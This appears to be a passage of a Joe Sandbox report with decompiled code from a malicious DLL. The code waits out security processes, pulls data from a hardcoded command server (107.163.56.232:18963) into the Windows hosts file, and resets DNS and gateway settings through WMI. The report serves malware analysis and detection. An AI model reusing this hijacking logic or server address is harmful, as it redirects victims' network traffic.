									 *((intOrPtr*)(_t266 + 8)) = 0;
								} else {
									 *((intOrPtr*)(_t266 + 8)) =  *_t193;
								}
								_t194 =  *((intOrPtr*)(_t266 - 0x18));
								if(_t194 == 0) {
									_t250 = 0;
									__eflags = 0;
								} else {
									_t250 =  *_t194;
								}
								_t254 = _t266 - 0x28;
								_t245 =  *((intOrPtr*)(_t266 - 0x78));
								_t196 =  *((intOrPtr*)( *_t245 + 0x60))(_t245, _t250,  *((intOrPtr*)(_t266 + 8)), 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t254, 0);
								_t246 =  *((intOrPtr*)(_t266 - 0x34));
								if( *((intOrPtr*)(_t266 - 0x34)) != 0) {
									E1000515C(_t196, _t246);
								}
								0x10035685(_t254,  *((intOrPtr*)(_t266 - 0x1c)));
								 *_t254();
								_t142 =  *_t254( *((intOrPtr*)(_t266 - 0x20)));
								_t219 =  *((intOrPtr*)(_t266 - 0x24));
								 *((char*)(_t266 - 4)) = 2;
								if( *((intOrPtr*)(_t266 - 0x24)) != 0) {
									_t142 = E1000515C(_t142, _t219);
								}
							}
						}
					}
					if( *((intOrPtr*)(_t266 + 0xc)) == 0) {
						L31:
						if( *((intOrPtr*)(_t266 + 0x10)) == 0) {
							L57:
							_t220 =  *((intOrPtr*)(_t266 - 0x18));
							_pop(_t209);
							if( *((intOrPtr*)(_t266 - 0x18)) != 0) {
								_t142 = E1000515C(_t142, _t220);
								 *((intOrPtr*)(_t266 - 0x18)) = 0;
							}
							goto L59;
						}
						_push( *((intOrPtr*)(_t266 + 0x10)));
						_t142 = E1000CD02(_t219, 0);
						_t292 = _t142;
						if(_t142 == 0) {
							goto L57;
						}
						L33:
						_push(_t266 - 0x10);
						_push("SetDNSServerSearchOrder");
						_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t292, _t307);
						_t293 = _t142;
						if(_t142 >= 0) {
							_push( *((intOrPtr*)(_t266 + 0xc)));
							asm("stosd");
							asm("stosd");
							asm("stosd");
							 *((intOrPtr*)(_t266 - 0x58)) = 0;
							 *((intOrPtr*)(_t266 - 0x5c)) = 2;
							E1000504D(_t210, _t266 + 0xc, _t250, _t266 - 0x58, 0, _t293, _t307);
							_push( *((intOrPtr*)(_t266 + 0x10)));
							 *((char*)(_t266 - 4)) = 7;
							E1000504D(_t210, _t266 + 8, _t250, _t266 - 0x58, 0, _t293, _t307);
							_t150 =  *((intOrPtr*)(_t266 + 0xc));
							 *((char*)(_t266 - 4)) = 8;
							if(_t150 == 0) {
								_t151 = 0;
								__eflags = 0;
							} else {
								_t151 =  *_t150;
							}
							 *((intOrPtr*)(_t266 - 0x3c)) = _t151;
							_t152 =  *((intOrPtr*)(_t266 + 8));
							_t295 = _t152;
							if(_t152 == 0) {
								_t153 = 0;
								__eflags = 0;
							} else {
								_t153 =  *_t152;
							}
							 *((intOrPtr*)(_t266 - 0x38)) = _t153;
							_t256 =  *_t210(8, 1, _t266 - 0x5c);
							 *((intOrPtr*)(_t256 + 0xc)) = _t266 - 0x3c;
							 *0x1000e230(_t266 - 0x4c);
							_push("DNSServerSearchOrder");
							 *((short*)(_t266 - 0x4c)) = 0x2008;
							 *((intOrPtr*)(_t266 - 0x44)) = _t256;
							_t160 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t250, _t256, 0, _t295, _t307)));
							 *((char*)(_t266 - 4)) = 9;
							if(_t160 == 0) {
								_t161 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t160;
							}
							_t226 =  *((intOrPtr*)(_t266 - 0x10));
							_t257 = _t266 - 0x4c;
							_t251 =  *_t226;
							_t162 =  *((intOrPtr*)( *_t226 + 0x14))(_t226, _t161, 0, _t266 - 0x4c, 0);
							_t227 =  *((intOrPtr*)(_t266 + 0x10));
							 *((char*)(_t266 - 4)) = 8;
							_t297 =  *((intOrPtr*)(_t266 + 0x10));
							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
								E1000515C(_t162, _t227);
							}
							_push("SetDNSServerSearchOrder");
							_t164 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t251, _t257, 0, _t297, _t307)));
							 *((char*)(_t266 - 4)) = 0xa;
							if(_t164 == 0) {
								_t165 = 0;
								__eflags = 0;
							} else {
								_t165 =  *_t164;
							}
							_t229 =  *((intOrPtr*)(_t266 - 0x18));
							if(_t229 == 0) {
								_t250 = 0;
								__eflags = 0;
							} else {
								_t250 =  *_t229;
							}
							_t230 =  *((intOrPtr*)(_t266 - 0x78));
							_t142 =  *((intOrPtr*)( *_t230 + 0x60))(_t230, _t250, _t165, 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t266 - 0x28, 0);
							_t231 =  *((intOrPtr*)(_t266 + 0x10));
							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
								_t142 = E1000515C(_t142, _t231);
								 *((intOrPtr*)(_t266 + 0x10)) = 0;
							}
							_t232 =  *((intOrPtr*)(_t266 + 8));
							if( *((intOrPtr*)(_t266 + 8)) != 0) {
								_t142 = E1000515C(_t142, _t232);
								 *((intOrPtr*)(_t266 + 8)) = 0;
							}
							_t233 =  *((intOrPtr*)(_t266 + 0xc));
							if( *((intOrPtr*)(_t266 + 0xc)) != 0) {
								_t142 = E1000515C(_t142, _t233);
								 *((intOrPtr*)(_t266 + 0xc)) = 0;
							}
						}
						goto L57;
					}
					_push( *((intOrPtr*)(_t266 + 0xc)));
					_t142 = E1000CD02(_t219, 0);
					_pop(_t219);
					if(_t142 != 0) {
						goto L33;
					}
					goto L31;
				}
			}

APIs

SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 10007349
VariantInit.OLEAUT32(?), ref: 1000735E
SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 10007379
VariantInit.OLEAUT32(?), ref: 10007388

Part of subcall function 10007A73: VariantInit.OLEAUT32(?), ref: 10007AB2

SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007516
VariantInit.OLEAUT32(?), ref: 10007524

Strings

Win32_NetworkAdapterConfiguration.Index=, xrefs: 100072B8
IPEnabled=TRUE, xrefs: 10007237
DefaultIPGateway, xrefs: 1000738D
SetGateways, xrefs: 10007302, 10007408
SetDNSServerSearchOrder, xrefs: 100074AC, 10007570
DNSServerSearchOrder, xrefs: 1000752A
Index, xrefs: 1000726E
Win32_NetworkAdapterConfiguration, xrefs: 1000723C
GatewayCostMetric, xrefs: 100073CF

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: InitVariant$ArrayCreateSafe
String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
API String ID: 2640012081-1668994663
Opcode ID: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
Instruction ID: e82695035937c1bda44e76a486134160da36d7b78c3243b38af4a6a2dd8dd1e6
Opcode Fuzzy Hash: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
Instruction Fuzzy Hash: 7AD14C70D00219EFEB15CFA4C8809EEBBB8FF49781F104019F519AB259DB75AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10006EEF Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 174
sleeplibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E10006EEF() {
				signed int _v8;
				void _v267;
				signed char _v268;
				void _v527;
				signed char _v528;
				void _v783;
				signed char _v784;
				void _v1807;
				signed char _v1808;
				void _v5903;
				signed char _v5904;
				void* _t53;
				void* _t65;
				signed int _t76;
				signed int _t90;
				void* _t94;
				void* _t95;
				void* _t96;
				signed int _t100;
				void* _t102;
				void* _t109;
				signed int _t110;
				void* _t117;
				void* _t118;
				signed int _t130;
				intOrPtr* _t132;
				void* _t134;
				char** _t135;
				char** _t138;
				char** _t140;
				void* _t143;
				void* _t146;

				E1000CD20(0x170c, _t96);
				_push(_t94);
				_t132 = E10001000(_t96, _t143, _t146, "QVNEU3ZjLmV4ZQ==");
				 *_t135 = "QVlSVFNydi5heWU=";
				_t118 = E10001000(_t96, _t143, _t146, _t117);
				L1:
				if(E1000591C(_t132) != 0 || E1000591C(_t118) != 0) {
					Sleep(0xea60);
					goto L1;
				}
				_v268 = _v268 & 0x00000000;
				_t100 = 0x40;
				_v528 = _v528 & 0x00000000;
				memset( &_v267, 0, _t100 << 2);
				asm("stosw");
				asm("stosb");
				__eflags = 0;
				_t102 = 0x40;
				_t53 = memset( &_v527, 0, 0 << 2);
				asm("stosw");
				E100268BC(_t53,  &_v527 + _t102);
				asm("stosb");
				 *_t132( &_v268, 0x104, _t53);
				 *_t132( &_v528, 0x104);
				_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3Rz"));
				E1000CD08(0,  &_v268);
				_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
				_t65 = E1000CCAE(E1000CD08(0,  &_v528), _t94, 0, _t116, 0x104, 0x80000, _t134, __eflags, _t146, 0x80000);
				_t138 =  &(_t135[0xd]);
				_t95 = _t65;
				while(1) {
					_v1808 = _v1808 & 0x00000000;
					memset( &_v1807, 0, 0xff << 2);
					_v784 = _v784 & 0x00000000;
					asm("stosw");
					asm("stosb");
					memset( &_v783, 0, 0 << 2);
					_t140 =  &(_t138[6]);
					asm("stosw");
					asm("stosb");
					__eflags = E10005C4C( &_v784, 0x100);
					_t109 = 0x3f;
					if(__eflags == 0) {
						_push("http://107.163.56.232:18963/main.php");
					} else {
						_push( &_v784);
					}
					_push("%s");
					_push( &_v1808);
					E10003EF4();
					_push(0x80000);
					_push(0);
					E1000CCFC(_t95, _t109, 0x80000, _t134, __eflags, _t95);
					_t76 = E100061BD(_t109, 0x80000, __eflags, _t146,  &_v1808, _t95, 0x80000);
					_t138 =  &(_t140[9]);
					__eflags = _t76 - 7;
					_v8 = _t76;
					if(__eflags > 0) {
						goto L11;
					}
					_push("iOffset");
					_push("c:\\1.txt");
					L10004139(_t109, _t116, __eflags, _t146);
					L10:
					Sleep( *0x10012500);
					continue;
					L11:
					_t110 = 0;
					__eflags = _t76;
					if(_t76 <= 0) {
						L16:
						_push(_t95);
						__eflags = E1000CD02(_t110, 0x80000) - 0x10;
						if(__eflags <= 0) {
							wsprintfA(0x10016ae0, "%s", _t95);
							_v5904 = _v5904 & 0x00000000;
							memset( &_v5903, 0, 0x3ff << 2);
							asm("stosw");
							asm("stosb");
							E10005318(0, __eflags,  &_v5904);
							E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v268);
							E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v528);
							_push(_t95);
							_push(0x10016ae0);
							E1000CDF2(0x80000);
							_t138 =  &(_t138[0xd]);
						}
						goto L10;
					} else {
						goto L12;
					}
					do {
						L12:
						_t90 = _t110;
						asm("cdq");
						_t130 = 2;
						_t116 = _t90 % _t130;
						__eflags = _t90 % _t130;
						if(_t90 % _t130 == 0) {
							_t32 = _t110 + _t95;
							 *_t32 =  *(_t110 + _t95) + 0x4b;
							__eflags =  *_t32;
						} else {
							 *(_t110 + _t95) =  *(_t110 + _t95) + 0x3a;
						}
						_t110 = _t110 + 1;
						__eflags = _t110 - _v8;
					} while (_t110 < _v8);
					goto L16;
				}
			}

0x10006ef7
0x10006efc
0x10006f09
0x10006f0b
0x10006f18
0x10006f1a
0x10006f23
0x10006f35
0x00000000
0x10006f35
0x10006f3d
0x10006f46
0x10006f4f
0x10006f56
0x10006f58
0x10006f5a
0x10006f5d
0x10006f5f
0x10006f66
0x10006f68
0x10006f6b
0x10006f70
0x10006f7e
0x10006f88
0x10006f94
0x10006f9c
0x10006fab
0x10006fbe
0x10006fc3
0x10006fc6
0x10006fc8
0x10006fc8
0x10006fdc
0x10006fde
0x10006fe7
0x10006fe9
0x10006ff8
0x10006ff8
0x10006ffa
0x10006ffc
0x1000700a
0x1000700c
0x1000700d
0x10007018
0x1000700f
0x10007015
0x10007015
0x10007023
0x10007028
0x10007029
0x10007031
0x10007032
0x10007035
0x10007043
0x10007048
0x1000704b
0x1000704e
0x10007051
0x00000000
0x00000000
0x10007053
0x10007058
0x1000705d
0x10007064
0x1000706a
0x00000000
0x10007075
0x10007075
0x10007077
0x10007079
0x10007097
0x10007097
0x1000709d
0x100070a1
0x100070ae
0x100070b4
0x100070c8
0x100070ca
0x100070cc
0x100070d4
0x100070e7
0x100070fa
0x100070ff
0x10007100
0x10007105
0x1000710a
0x1000710a
0x00000000
0x00000000
0x00000000
0x00000000
0x1000707b
0x1000707b
0x1000707b
0x1000707f
0x10007080
0x10007081
0x10007083
0x10007085
0x1000708d
0x1000708d
0x1000708d
0x10007087
0x10007087
0x10007087
0x10007091
0x10007092
0x10007092
0x00000000
0x1000707b

APIs

Sleep.KERNEL32(0000EA60), ref: 10006F35
LdrInitializeThunk.NTDLL ref: 10006F9C
LdrInitializeThunk.NTDLL ref: 10006FB3
Sleep.KERNEL32 ref: 1000706A
wsprintfA.USER32 ref: 100070AE
PrintFile.ABC(00000000,?,00000000), ref: 100070E7
PrintFile.ABC(00000000,?,00000000,?,00000000), ref: 100070FA

Strings

c:\1.txt, xrefs: 10007058
XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 10006FA1
QVNEU3ZjLmV4ZQ==, xrefs: 10006EFF
XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 10006F8A
iOffset, xrefs: 10007053
QVlSVFNydi5heWU=, xrefs: 10006F0B
http://107.163.56.232:18963/main.php, xrefs: 10007018

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: FileInitializePrintSleepThunk$wsprintf
String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
API String ID: 983772623-1685166179
Opcode ID: 5de879edd54ecaa5dde90807be5e49734b878345bfb175a52f25740afad77bc0
Instruction ID: 3d380b1aca1ede5b104bd14f8e69b562dc8f53a9395fdf47d07c0f5b95106c5e
Opcode Fuzzy Hash: 5de879edd54ecaa5dde90807be5e49734b878345bfb175a52f25740afad77bc0
Instruction Fuzzy Hash: 2651C8B6D04359AAFB21D774CC45FCF77ACEF08381F2045A6F208E6086DA75AB848E55

Uniqueness

Uniqueness Score: -1.00%

Function 10004D36 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E10004D36(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t98;
				intOrPtr* _t102;
				intOrPtr _t103;
				void* _t104;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t139;
				intOrPtr* _t141;
				intOrPtr* _t143;
				intOrPtr* _t145;
				void* _t146;
				void* _t148;
				intOrPtr* _t150;
				void* _t151;
				void* _t153;
				intOrPtr* _t163;
				signed int _t165;
				intOrPtr _t173;
				void* _t206;
				void* _t214;
				void* _t215;
				intOrPtr _t216;
				intOrPtr* _t217;
				intOrPtr* _t219;
				void* _t220;
				void* _t222;
				void* _t223;
				void* _t225;

				_t245 = __fp0;
				_t227 = __eflags;
				_t202 = __edi;
				_t161 = __ecx;
				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				E1000CD20(0x182c, __ecx);
				 *((intOrPtr*)(_t220 - 0x20)) = 0;
				_t98 = E1000CCFC(0, _t161, __esi, _t220, _t227, _t220 - 0x48);
				_t223 = _t222 + 0xc;
				0x1003a410(0, 0, 0, 0, 0x10, __edi, __esi, __ebx);
				E1002D3DC(_t98, 0, _t161, __edx, __edi, __esi, _t227, _t220, 0, 0xffffffff, 0, 0, 0);
				 *((intOrPtr*)(_t220 - 0x1c)) = 0;
				0x100411b4(E100101A8, 0, 1, E100100D8, _t220 - 0x1c, 3, 0, 0, 0);
				_push(cs);
				_push( *((intOrPtr*)(_t220 + 8)));
				 *((intOrPtr*)(_t220 - 0x18)) = 0;
				_t102 =  *((intOrPtr*)(E100050A1(0, _t220 + 8, __edx, _t202, __esi, _t227, __fp0)));
				 *(_t220 - 4) = 0;
				if(_t102 == 0) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 =  *_t102;
				}
				_t163 =  *((intOrPtr*)(_t220 - 0x1c));
				_t214 = _t220 - 0x18;
				_t198 =  *_t163;
				_t104 =  *((intOrPtr*)( *_t163 + 0xc))(_t163, _t103, 0, 0, 0, 0, 0, 0, _t214);
				_t164 =  *((intOrPtr*)(_t220 + 8));
				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
				_t229 =  *((intOrPtr*)(_t220 + 8));
				if( *((intOrPtr*)(_t220 + 8)) != 0) {
					E1000515C(_t104, _t164);
				}
				0x1003ed69(_t214,  *((intOrPtr*)(_t220 - 0x18)), 0xa, 0, 0, 3, 3, 0, 0);
				_t215 = L"SELECT * FROM ";
				_t165 = 7;
				memcpy(_t220 - 0x838, _t215, _t165 << 2);
				asm("movsw");
				_t206 = _t220 - 0x81a;
				memset(_t206, 0, 0x1ec << 2);
				_t225 = _t223 + 0x18;
				_t207 = _t206 + 0x1ec;
				asm("stosw");
				 *((intOrPtr*)(_t220 - 0x10)) = 0;
				0x1003bb02(_t215, _t220 - 0x838,  *((intOrPtr*)(_t220 + 0xc)));
				_push(_t220 - 0x838);
				_t111 =  *((intOrPtr*)(E100050A1(0, _t220 - 0x28, _t198, _t206 + 0x1ec, _t215, _t229, _t245)));
				 *(_t220 - 4) = 1;
				_t230 = _t111;
				if(_t111 == 0) {
					_t216 = 0;
					__eflags = 0;
				} else {
					_t216 =  *_t111;
				}
				_push("WQL");
				_t113 =  *((intOrPtr*)(E1000504D(0, _t220 + 8, _t198, _t207, _t216, _t230, _t245)));
				 *(_t220 - 4) = 2;
				if(_t113 == 0) {
					_t173 = 0;
					__eflags = 0;
				} else {
					_t173 =  *_t113;
				}
				_t114 =  *((intOrPtr*)(_t220 - 0x18));
				_t199 =  *_t114;
				_t115 =  *((intOrPtr*)( *_t114 + 0x50))(_t114, _t173, _t216, 0x30, 0, _t220 - 0x10);
				_t174 =  *((intOrPtr*)(_t220 + 8));
				if( *((intOrPtr*)(_t220 + 8)) != 0) {
					_t115 = E1000515C(_t115, _t174);
					 *((intOrPtr*)(_t220 + 8)) = 0;
				}
				_t175 =  *((intOrPtr*)(_t220 - 0x28));
				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t220 - 0x28)) != 0) {
					_t115 = E1000515C(_t115, _t175);
				}
				 *((intOrPtr*)(_t220 - 0x24)) = 0;
				if( *((intOrPtr*)(_t220 - 0x10)) == 0) {
					L32:
					_pop(_t217);
					E10025EA7(_t115, 0, _t175, _t199, _t217, _t220, _t243);
					 *_t217(_t220 - 0x48);
					 *_t217(_t220 - 0x38);
					_t121 =  *((intOrPtr*)(_t220 - 0x18));
					 *((intOrPtr*)( *_t121 + 8))(_t121);
					_t123 =  *((intOrPtr*)(_t220 - 0x1c));
					 *((intOrPtr*)( *_t123 + 8))(_t123);
					_t125 =  *((intOrPtr*)(_t220 - 0x10));
					 *((intOrPtr*)( *_t125 + 8))(_t125);
					_t127 =  *((intOrPtr*)(_t220 - 0x14));
					E10026ED3( *((intOrPtr*)( *_t127 + 8))(_t127), 0,  *_t127, _t199, _t217, _t243);
					 *[fs:0x0] =  *((intOrPtr*)(_t220 - 0xc));
					return  *((intOrPtr*)(_t220 - 0x20));
				} else {
					_t219 =  *0x1000e230;
					while(1) {
						_push(_t220 - 0x24);
						_t175 = _t220 - 0x14;
						_push(_t220 - 0x14);
						_push(1);
						_push(0xffffffff);
						_push( *((intOrPtr*)(_t220 - 0x10)));
						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x10)))) + 0x10))() != 0) {
							goto L32;
						}
						 *_t219(_t220 - 0x48);
						 *_t219(_t220 - 0x38);
						 *_t219(_t220 - 0x68);
						_t139 =  *((intOrPtr*)(_t220 - 0x14));
						 *((intOrPtr*)(_t220 - 0x30)) = 0;
						 *((intOrPtr*)( *_t139 + 0x10))(_t139, L"Name", 0, _t220 - 0x48, 0, 0);
						_t141 =  *((intOrPtr*)(_t220 - 0x14));
						 *((intOrPtr*)( *_t141 + 0x10))(_t141, L"CommandLine", 0, _t220 - 0x38, 0, 0);
						_t143 =  *((intOrPtr*)(_t220 - 0x14));
						_t199 = _t220 - 0x68;
						_t175 =  *_t143;
						_t115 =  *((intOrPtr*)( *_t143 + 0x10))(_t143, L"ProcessID", 0, _t220 - 0x68, 0, 0);
						_t236 =  *((intOrPtr*)(_t220 - 0x30));
						if( *((intOrPtr*)(_t220 - 0x30)) != 0) {
							 *(_t220 - 0x58) = 0;
							_push( *((intOrPtr*)(_t220 - 0x40)));
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_t145 = E100050A1(0, _t220 + 8, _t199, _t220 - 0x57, _t219, _t236, _t245);
							_t186 =  *_t145;
							 *(_t220 - 4) = 3;
							if( *_t145 == 0) {
								_t146 = 0;
								__eflags = 0;
							} else {
								_t146 = E10005189(_t186, _t199, _t245);
							}
							_push(_t146);
							_t148 = E1000CD0E(_t186, _t220 - 0x58);
							 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
							_t189 =  *((intOrPtr*)(_t220 + 8));
							if( *((intOrPtr*)(_t220 + 8)) != 0) {
								E1000515C(_t148, _t189);
								 *((intOrPtr*)(_t220 + 8)) = 0;
							}
							_t115 = _t220 - 0x58;
							0x10033fcb(_t115, "svchost.exe");
							_t239 = _t115;
							_t175 = _t219;
							if(_t115 == 0) {
								 *((char*)(_t220 - 0x1838)) = 0;
								_push( *((intOrPtr*)(_t220 - 0x30)));
								memset(_t220 - 0x1837, _t115, 0x3ff << 2);
								_t225 = _t225 + 0xc;
								asm("stosw");
								asm("stosb");
								_t150 = E100050A1(0, _t220 + 0xc, _t199, _t220 - 0x1837 + 0x3ff, _t219, _t239, _t245);
								_t194 =  *_t150;
								 *(_t220 - 4) = 4;
								if( *_t150 == 0) {
									_t151 = 0;
									__eflags = 0;
								} else {
									_t151 = E10005189(_t194, _t199, _t245);
								}
								_push(_t151);
								_t153 = E1000CD0E(_t194, _t220 - 0x1838);
								 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
								_t175 =  *((intOrPtr*)(_t220 + 0xc));
								if( *((intOrPtr*)(_t220 + 0xc)) != 0) {
									E1000515C(_t153, _t175);
									 *((intOrPtr*)(_t220 + 0xc)) = 0;
								}
								0x10035299(_t220 - 0x1838, "svchost.exe -k NetworkService");
								asm("fild dword [ebp-0x74f98b40]");
								_t220 = _t220 + 1;
								_t115 =  *0x39e04589;
							}
						}
						_t243 =  *((intOrPtr*)(_t220 - 0x10));
						if( *((intOrPtr*)(_t220 - 0x10)) != 0) {
							continue;
						} else {
							goto L32;
						}
					}
					goto L32;
				}
			}

APIs

VariantInit.OLEAUT32(00000000), ref: 10004EC5
VariantInit.OLEAUT32(?), ref: 10004ECB
VariantInit.OLEAUT32(000000FF), ref: 10004ED1

Strings

svchost.exe -k NetworkService, xrefs: 10004FE0
CommandLine, xrefs: 10004EF7
SELECT * FROM , xrefs: 10004DEA, 10004E18
Name, xrefs: 10004EE2
svchost.exe, xrefs: 10004F6F
ProcessID, xrefs: 10004F0C
WQL, xrefs: 10004E42

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: InitVariant
String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
API String ID: 1927566239-2685825574
Opcode ID: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
Instruction ID: 685215bc3e39be9e7018d3cf9a0ce008db6110164ca837be315af6ad884bf42e
Opcode Fuzzy Hash: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
Instruction Fuzzy Hash: 7AA15BB5900209AFEB04DF94CC81DEEBBBCEF48394F104569F615AB295CB31AE45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000827D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 145
librarysleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E1000827D() {
				signed int _v8;
				void _v267;
				signed char _v268;
				void _v527;
				signed char _v528;
				char _v783;
				signed char _v784;
				void _v1807;
				signed char _v1808;
				void* _t50;
				void* _t56;
				signed int _t61;
				signed int _t67;
				void* _t70;
				void* _t71;
				signed int _t72;
				void* _t78;
				void* _t81;
				signed int _t82;
				void* _t83;
				void* _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t98;
				void* _t99;
				void* _t102;
				void* _t104;
				void* _t109;

				_v268 = _v268 & 0x00000000;
				_t72 = 0x40;
				memset( &_v267, 0, _t72 << 2);
				_v528 = _v528 & 0x00000000;
				asm("stosw");
				asm("stosb");
				memset( &_v527, E1002ED85(_t96, _t98), 0 << 2);
				asm("stosw");
				asm("stosb");
				 *_t96( &_v268, 0x104, _t98, 0x40);
				 *_t96( &_v528, 0x104);
				_push(E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3Rz"));
				E1000CD08(0,  &_v268);
				_push(E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
				_t50 = E1000CCAE(E1000CD08(0,  &_v528), _t70, 0, _t86, 0x104, 0x80000, _t98, 0, _t109, 0x80000);
				_t102 = _t99 + 0x34;
				_t71 = _t50;
				while(1) {
					_v1808 = _v1808 & 0x00000000;
					memset( &_v1807, 0, 0xff << 2);
					_v784 = _v784 & 0x00000000;
					asm("stosw");
					asm("stosb");
					_t78 = 0x3f;
					_t94 =  &_v783;
					memset(_t94, 0, 0 << 2);
					_t104 = _t102 + 0x18;
					_t95 = _t94 + _t78;
					asm("stosw");
					asm("stosb");
					_t56 = E10005C4C( &_v784, 0x100);
					_t107 = _t56;
					_pop(_t81);
					if(_t56 == 0) {
						_push("http://107.163.56.232:18963/main.php");
					} else {
						_push( &_v784);
					}
					_push("%s");
					_push( &_v1808);
					E10003EF4();
					_push(0x80000);
					_push(0);
					E1000CCFC(_t71, _t81, 0x80000, _t98, _t107, _t71);
					_t61 = E100061BD(_t81, 0x80000, _t107, _t109,  &_v1808, _t71, 0x80000);
					_t102 = _t104 + 0x24;
					_v8 = _t61;
					if(_t61 > 7) {
						goto L6;
					}
					L5:
					Sleep( *0x10012500);
					continue;
					L6:
					_t82 = 0;
					__eflags = _t61;
					if(_t61 <= 0) {
						L11:
						__eflags = E1000CD02(_t82, 0x80000) - 0x10;
						_t83 = _t71;
						if(__eflags <= 0) {
							_t95 = 0x10016ae0;
							_push(_t71);
							__eflags = E1000CDF2(0x80000);
							_t83 = 0x10016ae0;
							if(__eflags != 0) {
								wsprintfA(0x10016ae0, "%s", _t71);
								_t102 = _t102 + 0xc;
							}
						}
						E1000721F(_t71, _t83, _t86, _t95, 0x80000, __eflags, _t109);
